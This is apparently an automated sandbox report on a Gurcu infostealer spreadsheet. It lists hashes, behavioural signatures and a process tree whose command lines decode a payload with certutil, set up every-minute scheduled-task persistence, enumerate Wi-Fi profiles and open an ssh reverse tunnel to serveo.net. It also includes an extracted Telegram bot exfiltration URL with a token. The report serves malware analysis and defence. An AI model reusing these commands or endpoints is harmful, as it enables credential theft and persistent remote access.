Analysis
- max time kernel: 137s
- max time network: 149s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27-10-2024 10:57
- Static task: static1
- Behavioral task: behavioral1
  Sample: e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm
  Resource: win7-20240903-en
- Behavioral task: behavioral2
  Sample: e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm
  Resource: win10v2004-20241007-en

General
- Target: e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm
- Size: 201KB
- MD5: c595d96742a883a534ed1ca1f0d279d1
- SHA1: c465daa9e5bd998ef39c59f80f82f79cc75ce659
- SHA256: e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de
- SHA512: 142506545388000aad69fbd9dabd62cb80b75fceb83cb8e31747a1c2de5495327fff2d4a6badabc691fb68df2361aa9f0a5adf969cf3f688b1f89959ca04538b
- SSDEEP: 6144:+pQEXBxlv/9mIRzcZcD50SQBpDb8FJA7xqSWbLsE4D:+XBrv/AIRA6D5nQB5b8FJA7xGfsVD
Malware Config
Extracted
- Family: gurcu
- URL: https://api.telegram.org/bot7761583635:AAGKfAalgYsBotuxvw8mb6qVnPPY4_337uo/sendMessage?chat_id=972119615
Signatures
- Gurcu family
- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; pid: 1140; pid_target: 3692; Process: certutil.exe; procid_target: 83
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation (Of74e1e35dd903c3c23095278b7f18453a5.exe)
- Executes dropped EXE (4 IoCs)
  PID 2284 Of74e1e35dd903c3c23095278b7f18453a5.exe
  PID 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe
  PID 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe
  PID 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe
- Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTPs, 9 IoCs)
  Keys opened by Of74e1e35dd903c3c23095278b7f18453a5.exe:
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Deobfuscate/Decode Files or Information
  PID 1140 certutil.exe
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 31: ip-api.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTPs, 6 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
  Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
  Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
  Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
  Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
  Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- System Network Configuration Discovery: Wi-Fi Discovery (1 TTPs, 2 IoCs)
  Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
  PID 3024 cmd.exe
  PID 3708 netsh.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
- Delays execution with timeout.exe (1 IoCs)
  PID 5004 timeout.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)
- Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 1000 schtasks.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  PID 3692 EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  PID 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe (6 entries)
  PID 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe (2 entries)
  PID 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe (1 entry)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege, PID 2284 Of74e1e35dd903c3c23095278b7f18453a5.exe
  Token: SeDebugPrivilege, PID 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe
  Token: SeDebugPrivilege, PID 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe
  Token: SeDebugPrivilege, PID 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe
- Suspicious use of SetWindowsHookEx (15 IoCs)
  PID 3692 EXCEL.EXE (12 entries)
  PID 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe
  PID 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe
  PID 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe
- Suspicious use of WriteProcessMemory (32 IoCs; each entry below is recorded twice in the report)
  PID 3692 EXCEL.EXE wrote to memory of 1140 (procid_target 87)
  PID 3692 EXCEL.EXE wrote to memory of 2284 (procid_target 90)
  PID 2284 Of74e1e35dd903c3c23095278b7f18453a5.exe wrote to memory of 2036 (procid_target 92)
  PID 2036 cmd.exe wrote to memory of 2568 (procid_target 94)
  PID 2036 cmd.exe wrote to memory of 5004 (procid_target 95)
  PID 2036 cmd.exe wrote to memory of 1000 (procid_target 101)
  PID 2036 cmd.exe wrote to memory of 3812 (procid_target 102)
  PID 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe wrote to memory of 3024 (procid_target 103)
  PID 3024 cmd.exe wrote to memory of 4484 (procid_target 105)
  PID 3024 cmd.exe wrote to memory of 3708 (procid_target 106)
  PID 3024 cmd.exe wrote to memory of 2440 (procid_target 107)
  PID 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe wrote to memory of 4704 (procid_target 108)
  PID 4704 cmd.exe wrote to memory of 3192 (procid_target 110)
  PID 4704 cmd.exe wrote to memory of 2064 (procid_target 111)
  PID 4704 cmd.exe wrote to memory of 1432 (procid_target 112)
  PID 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe wrote to memory of 3600 (procid_target 115)
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- outlook_office_path (1 IoCs)
  Key opened: \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Of74e1e35dd903c3c23095278b7f18453a5.exe)
- outlook_win_path (1 IoCs)
  Key opened: \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Of74e1e35dd903c3c23095278b7f18453a5.exe)
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 3692)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\System32\certutil.exe (PID 1140)
      Command line: "C:\Windows\System32\certutil.exe" -decode C:\Users\Admin\AppData\Local\Temp\Z74435e84d5ae7c60f81018b4950fef2fc7 C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe
      - Process spawned unexpected child process
      - Deobfuscate/Decode Files or Information
    C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe (PID 2284)
      Command line: "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\System32\cmd.exe (PID 2036)
          Command line: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"
          - Suspicious use of WriteProcessMemory
            C:\Windows\system32\chcp.com (PID 2568)
              Command line: chcp 65001
            C:\Windows\system32\timeout.exe (PID 5004)
              Command line: timeout /t 3
              - Delays execution with timeout.exe
            C:\Windows\system32\schtasks.exe (PID 1000)
              Command line: schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f
              - Scheduled Task/Job: Scheduled Task
            C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe (PID 3812)
              Command line: "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"
              - Executes dropped EXE
              - Accesses Microsoft Outlook profiles
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              - outlook_office_path
              - outlook_win_path
                C:\Windows\SYSTEM32\cmd.exe (PID 3024)
                  Command line: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                  - System Network Configuration Discovery: Wi-Fi Discovery
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\system32\chcp.com (PID 4484)
                      Command line: chcp 65001
                    C:\Windows\system32\netsh.exe (PID 3708)
                      Command line: netsh wlan show profiles
                      - Event Triggered Execution: Netsh Helper DLL
                      - System Network Configuration Discovery: Wi-Fi Discovery
                    C:\Windows\system32\findstr.exe (PID 2440)
                      Command line: findstr /R /C:"[ ]:[ ]"
                C:\Windows\SYSTEM32\cmd.exe (PID 4704)
                  Command line: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\system32\chcp.com (PID 3192)
                      Command line: chcp 65001
                    C:\Windows\system32\netsh.exe (PID 2064)
                      Command line: netsh wlan show networks mode=bssid
                      - Event Triggered Execution: Netsh Helper DLL
                    C:\Windows\system32\findstr.exe (PID 1432)
                      Command line: findstr "SSID BSSID Signal"
                C:\Windows\System32\OpenSSH\ssh.exe (PID 3600)
                  Command line: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3068 serveo.net
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe (PID 3712)
  Command line: C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe (PID 1828)
  Command line: C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
- Persistence
  - Event Triggered Execution (1): Netsh Helper DLL (1)
  - Scheduled Task/Job (1): Scheduled Task (1)
- Privilege Escalation
  - Event Triggered Execution (1): Netsh Helper DLL (1)
  - Scheduled Task/Job (1): Scheduled Task (1)
- Credential Access
  - Credentials from Password Stores (1): Credentials from Web Browsers (1)
  - Unsecured Credentials (2): Credentials In Files (1), Credentials in Registry (1)